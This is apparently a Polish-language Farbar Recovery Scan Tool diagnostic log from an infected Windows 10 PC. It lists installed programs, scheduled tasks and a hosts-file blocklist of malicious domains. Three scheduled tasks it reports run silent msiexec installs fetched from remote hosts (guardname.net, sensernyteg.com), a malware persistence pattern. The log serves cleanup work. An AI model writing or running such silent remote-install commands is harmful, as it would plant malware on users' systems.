Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 14.01.2019 01 Uruchomiony przez PiotriPawel (15-01-2019 15:44:57) Uruchomiony z F:\Pobrane Windows 10 Education Wersja 1809 17763.253 (X64) (2018-12-14 00:03:27) Tryb startu: Safe Mode (with Networking) ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-3233140318-2867628280-3791645511-500 - Administrator - Disabled) Gość (S-1-5-21-3233140318-2867628280-3791645511-501 - Limited - Disabled) Konto domyślne (S-1-5-21-3233140318-2867628280-3791645511-503 - Limited - Disabled) PiotriPawel (S-1-5-21-3233140318-2867628280-3791645511-1001 - Administrator - Enabled) => C:\Users\PiotriPawel WDAGUtilityAccount (S-1-5-21-3233140318-2867628280-3791645511-504 - Limited - Disabled) ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) µTorrent (HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\uTorrent) (Version: 3.5.5.44954 - BitTorrent Inc.) Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 19.010.20064 - Adobe Systems Incorporated) Adobe Flash Player 31 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 31.0.0.148 - Adobe Systems Incorporated) Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) Blitz (HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\Blitz) (Version: 0.9.9 - Blitz Esports) CCleaner (HKLM\...\CCleaner) (Version: 5.50 - Piriform) CodeBlocks (HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\CodeBlocks) (Version: 17.12 - The Code::Blocks Team) CPUID HWMonitor 1.38 (HKLM\...\CPUID HWMonitor_is1) (Version: 1.38 - CPUID, Inc.) CrystalDiskInfo 8.0.0 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 8.0.0 - Crystal Dew World) Defraggler (HKLM\...\Defraggler) (Version: 2.22 - Piriform) Discord (HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\Discord) (Version: 0.0.301 - Discord Inc.) DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 417.35 - NVIDIA Corporation) Hidden Driver Easy 5.6.9 (HKLM\...\DriverEasy_is1) (Version: 5.6.9 - Easeware) Emsisoft HiJackFree 4.5 (HKLM-x32\...\Emsisoft HiJackFree_is1) (Version: 4.5 - Emsi Software GmbH) Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden FIFA 19 (HKLM-x32\...\{3391E07D-8484-4124-817E-FCBDA859FD62}) (Version: 1.0.59.12718 - Electronic Arts) Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment) jv16 PowerTools (HKLM-x32\...\jv16 PowerTools) (Version: - Macecraft Software) jv16 PowerTools 2017 (HKLM-x32\...\jv16 PowerTools 2017) (Version: 4.1.0.1758 - Macecraft Software) Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden LibreOffice 6.1.2.1 (HKLM\...\{E5FC66AA-995A-488A-BEBE-8B5C351F939A}) (Version: 6.1.2.1 - The Document Foundation) Lightshot-5.4.0.35 (HKLM-x32\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.4.0.35 - Skillbrains) Microsoft .NET Core SDK 2.1.403 (x64) (HKLM-x32\...\{2eabe091-c571-4b9d-bdaa-5df5d11c84d4}) (Version: 2.1.403 - Microsoft Corporation) Microsoft SQL Server 2012 Native Client (HKLM\...\{1385D3DB-8E80-427B-91D2-B7535862B8E4}) (Version: 11.3.6518.0 - Microsoft Corporation) Microsoft SQL Server 2016 LocalDB (HKLM\...\{9097BF1A-13A0-4A4A-A1F8-473E2A669863}) (Version: 13.1.4001.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 (HKLM-x32\...\{49e969a1-2990-464d-92b5-25f6f34573c6}) (Version: 12.0.40664.0 - Корпорация Майкрософт) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{d2c8df0e-f15d-4426-9e51-f13f329f9cb4}) (Version: 12.0.40664.0 - Корпорация Майкрософт) Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 (HKLM-x32\...\{95ac1cfa-f4fb-4d1b-8912-7f9d5fbb140d}) (Version: 14.15.26706.0 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (HKLM-x32\...\{7e9fae12-5bbf-47fb-b944-09c49e75c061}) (Version: 14.15.26706.0 - Microsoft Corporation) Mozilla Firefox 64.0.2 (x64 pl) (HKLM\...\Mozilla Firefox 64.0.2 (x64 pl)) (Version: 64.0.2 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 60.2.1 - Mozilla) Mozilla Thunderbird 60.2.1 (x86 pl) (HKLM-x32\...\Mozilla Thunderbird 60.2.1 (x86 pl)) (Version: 60.2.1 - Mozilla) MSI Afterburner 4.5.0 (HKLM-x32\...\Afterburner) (Version: 4.5.0 - MSI Co., LTD) NVIDIA Oprogramowanie systemu PhysX 9.18.0907 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.18.0907 - NVIDIA Corporation) NVIDIA Sterownik 3D Vision 417.35 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 417.35 - NVIDIA Corporation) NVIDIA Sterownik graficzny 417.35 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 417.35 - NVIDIA Corporation) NVIDIA Sterownik kontrolera 3D Vision 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation) Oprogramowanie mikroukładu Intel® (HKLM-x32\...\{49bc1e38-39b4-4728-9e75-cbe67ba9a329}) (Version: 10.1.1.42 - Intel(R) Corporation) Hidden Origin (HKLM-x32\...\Origin) (Version: 10.5.32.18460 - Electronic Arts, Inc.) Pakiet sterowników systemu Windows - Sony Mobile Communications (ggsomc) SOMCFlashDevice (12/06/2017 3.2.0.0) (HKLM\...\7AA77B236196DB9A6C04257060560ACDBB626F30) (Version: 12/06/2017 3.2.0.0 - Sony Mobile Communications) Panel sterowania NVIDIA 417.35 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 417.35 - NVIDIA Corporation) Hidden Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8560 - Realtek Semiconductor Corp.) RivaTuner Statistics Server 7.2.0 (HKLM-x32\...\RTSS) (Version: 7.2.0 - Unwinder) ScpToolkit (HKLM\...\{AC052048-9828-45E3-872B-04CE30A3B58B}) (Version: 1.6.238.16010 - Nefarius Software Solutions) Sony Mobile Software Update Drivers (HKLM\...\{4872001F-F67C-4C54-BC92-281C6A165251}) (Version: 3.2.0.3 - Sony Mobile Communications) SSDFresh 2019 (HKLM-x32\...\{71149886-0AA3-4F31-81F9-CC90EA0D55EF}_is1) (Version: 8 - Abelssoft) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) SteelSeries Engine 3.13.4 (HKLM\...\SteelSeries Engine 3) (Version: 3.13.4 - SteelSeries ApS) Stickies 9.0e (HKLM-x32\...\ZhornStickies) (Version: - Zhorn Software) VLC media player (HKLM\...\VLC media player) (Version: 3.0.4 - VideoLAN) WinDirStat 1.1.2 (HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\WinDirStat) (Version: - ) Windows Mobile Connectivity Tools 10.0.15254.0 - Desktop x86 (HKLM-x32\...\{833F02C5-2C39-49F6-BD64-91D351081274}) (Version: 10.1.15254.1 - Microsoft Corporation) Windows SDK AddOn (HKLM-x32\...\{E77C2F78-6089-48F8-89DF-DDF2850DFFD9}) (Version: 10.1.0.0 - Microsoft Corporation) WinRAR 5.61 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.61.0 - win.rar GmbH) Zemana AntiMalware (HKLM-x32\...\{8F0CD7D1-42F3-4195-95CD-833578D45057}_is1) (Version: 2.74.0.150 - Zemana Ltd.) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Brak pliku ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Brak pliku ContextMenuHandlers1: [2.0 Zemana AntiMalware] -> {6ABB1C11-E261-4CEA-BBB5-3836225689DD} => C:\Program Files (x86)\Zemana AntiMalware\ZAMShellExt64.dll [2019-01-12] () ContextMenuHandlers1: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => D:\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => D:\Winrar\rarext.dll [2018-09-30] (Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => D:\Winrar\rarext32.dll [2018-09-30] (Alexander Roshal) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2018-12-11] (NVIDIA Corporation) ContextMenuHandlers6: [2.0 Zemana AntiMalware] -> {6ABB1C11-E261-4CEA-BBB5-3836225689DD} => C:\Program Files (x86)\Zemana AntiMalware\ZAMShellExt64.dll [2019-01-12] () ContextMenuHandlers6: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => D:\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => D:\Winrar\rarext.dll [2018-09-30] (Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => D:\Winrar\rarext32.dll [2018-09-30] (Alexander Roshal) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {0684E5A6-3BFF-49FD-B416-F158F0AF695F} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-08-14] (Adobe Systems Incorporated) Task: {095AA852-45C7-4D75-B683-1FAA40FFFDE5} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_31_0_0_148_Plugin.exe [2018-11-13] (Adobe Systems Incorporated) Task: {0AB8F562-467D-4437-BAF4-50EB38C4D77A} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe Task: {0BFA1F59-5EFB-4DA4-AEE6-D0D2CA7E7F34} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\Intel(R) Management Engine Components\iCLS\IntelPTTEKRecertification.exe [2018-06-08] (Intel(R) Corporation) Task: {131569A2-432D-474E-80BC-E2C3CD3711B2} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe Task: {2656C448-4927-4D71-A091-AE9E49099C0B} - System32\Tasks\NvTmRepCR1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-12-06] (NVIDIA Corporation) Task: {36013960-6FE6-4736-8509-7E6F4675424A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation) Task: {4142DA09-42F9-44A0-ADF4-371C97BD6CE2} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [2019-01-14] (AVAST Software) Task: {4E973841-FF20-4A0D-987F-52FDDE1CBE2E} - System32\Tasks\ikwmdb => "msiexec" -package hxxps://guardname.net/vvohqowru.gtb /q Task: {5AA8375E-BD9C-4413-A71A-877110B21449} - System32\Tasks\NvTmRepCR2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-12-06] (NVIDIA Corporation) Task: {5B51D5BE-361E-4F82-8153-8BEF9A8C62A5} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-12-06] (NVIDIA Corporation) Task: {6382963C-501D-40F2-B43A-3A53E96CCE62} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation) Task: {649CCCF4-D449-466E-91B8-DB523DA329FB} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2018-12-06] (NVIDIA Corporation) Task: {76B43148-4DAF-4285-AD8C-71B16EFB449E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-11-13] (Adobe Systems Incorporated) Task: {7A0D620D-831E-4F60-8C76-A9820AB66FE8} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2018-11-28] (Piriform Ltd) Task: {8C312834-6AF8-4949-BB01-4C1B8ED94EA8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation) Task: {8CBF91A5-1623-4A9A-BA19-685B760C88A5} - System32\Tasks\update-S-1-5-21-3233140318-2867628280-3791645511-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2017-04-12] (TODO: ) Task: {92437699-1CFE-4680-9624-3E945BCB6B3C} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2018-11-28] (Piriform Software Ltd) Task: {A594A0E8-9FC9-4B37-B203-54D2A17844AB} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-12-06] (NVIDIA Corporation) Task: {ACFED1D2-AC18-4BA6-8B50-8FB279C16213} - System32\Tasks\NvTmRepCR3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-12-06] (NVIDIA Corporation) Task: {C83F099F-5CBB-446C-83B0-B427D7F10F96} - System32\Tasks\oicieucak => "msiexec" /q -package hxxps://guardname.net/yfyuiejeluijii.iia Task: {C934868A-1653-4FAA-8304-338ED46952A6} - System32\Tasks\Driver Easy Scheduled Scan => D:\DriverEasy\DriverEasy.exe [2019-01-03] (Easeware) Task: {D4298E68-F1E1-470C-AA8E-E117A1DCA5A3} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-12-06] (NVIDIA Corporation) Task: {D732DBCD-855F-47BC-A418-2CB5370D58DE} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe Task: {E02776E2-7F24-43D5-9507-EF50382EC621} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2017-04-12] (TODO: ) Task: {E2D671E8-287A-43D2-B319-8701BCFEBBF1} - System32\Tasks\{882E246F-2FA3-E339-BC45-CBDDDC20F917} => "msiexec.exe" /package hxxps://sensernyteg.com/ef4jom666zm0.ayo -q Task: {E39F8E32-F4B6-44B2-B8AF-D84A6CFEB7B8} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\WINDOWS\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-09-15] () Task: {E50D2273-7666-4DBB-AFD2-F7C65B884CFC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation) Task: {F2C38B3A-A22E-4408-87FF-DFB7806917A7} - System32\Tasks\updater => C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe [2016-01-10] (Nefarius Software Solutions) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe Task: C:\WINDOWS\Tasks\Driver Easy Scheduled Scan.job => D:\DriverEasy\DriverEasy.exe Task: C:\WINDOWS\Tasks\update-S-1-5-21-3233140318-2867628280-3791645511-1001.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe Task: C:\WINDOWS\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe ==================== Skróty & WMI ======================== (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ==================== Załadowane moduły (filtrowane) ============== 2018-09-15 08:28 - 2018-09-15 08:28 - 000834088 _____ () C:\Windows\System32\InputHost.dll 2018-09-15 08:28 - 2018-09-15 08:28 - 000474624 _____ () C:\Windows\ShellExperiences\TileControl.dll 2018-12-14 00:51 - 2018-12-14 00:51 - 002801152 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll 2018-09-15 08:28 - 2018-09-15 08:28 - 001740288 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2018-12-13 00:06 - 2018-12-13 00:06 - 000182272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe 2018-10-25 16:41 - 2018-10-25 16:41 - 000009216 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\ImagePipelineNative.dll 2018-12-13 00:06 - 2018-12-13 00:06 - 000060416 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\ChakraBridge.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) AlternateDataStreams: C:\ProgramData\TEMP:1AAB2E68 [183] AlternateDataStreams: C:\ProgramData\TEMP:B755D674 [270] ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="2" ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com Wykryto więcej niż wyliczono: 7943 witryn. IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\007guard.com -> install.007guard.com IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\008i.com -> 008i.com IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\008k.com -> www.008k.com IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\00hq.com -> www.00hq.com IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\010402.com -> 010402.com IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\0scan.com -> www.0scan.com IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\1-2005-search.com -> www.1-2005-search.com IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\1-domains-registrations.com -> www.1-domains-registrations.com IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\1000gratisproben.com -> www.1000gratisproben.com IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\1001namen.com -> www.1001namen.com IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\100888290cs.com -> mir.100888290cs.com IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\100sexlinks.com -> www.100sexlinks.com IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\10sek.com -> www.10sek.com IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\12-26.net -> user1.12-26.net IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\12-27.net -> user1.12-27.net IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\123fporn.info -> www.123fporn.info IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\123haustiereundmehr.com -> www.123haustiereundmehr.com IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\123moviedownload.com -> www.123moviedownload.com IE restricted site: HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\...\123simsen.com -> www.123simsen.com Wykryto więcej niż wyliczono: 7943 witryn. ==================== Hosts - zawartość: ========================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2018-04-12 00:38 - 2019-01-07 23:07 - 000454774 ____R C:\WINDOWS\system32\drivers\etc\hosts 127.0.0.1 www.007guard.com 127.0.0.1 007guard.com 127.0.0.1 008i.com 127.0.0.1 www.008k.com 127.0.0.1 008k.com 127.0.0.1 www.00hq.com 127.0.0.1 00hq.com 127.0.0.1 010402.com 127.0.0.1 www.032439.com 127.0.0.1 032439.com 127.0.0.1 www.0scan.com 127.0.0.1 0scan.com 127.0.0.1 1000gratisproben.com 127.0.0.1 www.1000gratisproben.com 127.0.0.1 1001namen.com 127.0.0.1 www.1001namen.com 127.0.0.1 100888290cs.com 127.0.0.1 www.100888290cs.com 127.0.0.1 www.100sexlinks.com 127.0.0.1 100sexlinks.com 127.0.0.1 10sek.com 127.0.0.1 www.10sek.com 127.0.0.1 www.1-2005-search.com 127.0.0.1 1-2005-search.com 127.0.0.1 123fporn.info 127.0.0.1 www.123fporn.info 127.0.0.1 www.123haustiereundmehr.com 127.0.0.1 123haustiereundmehr.com 127.0.0.1 123moviedownload.com 127.0.0.1 www.123moviedownload.com Wykryto więcej niż wyliczono: 15610 linii. ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-3233140318-2867628280-3791645511-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg DNS Servers: 62.179.1.63 - 62.179.1.62 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: ) Zapora systemu Windows [funkcja włączona] 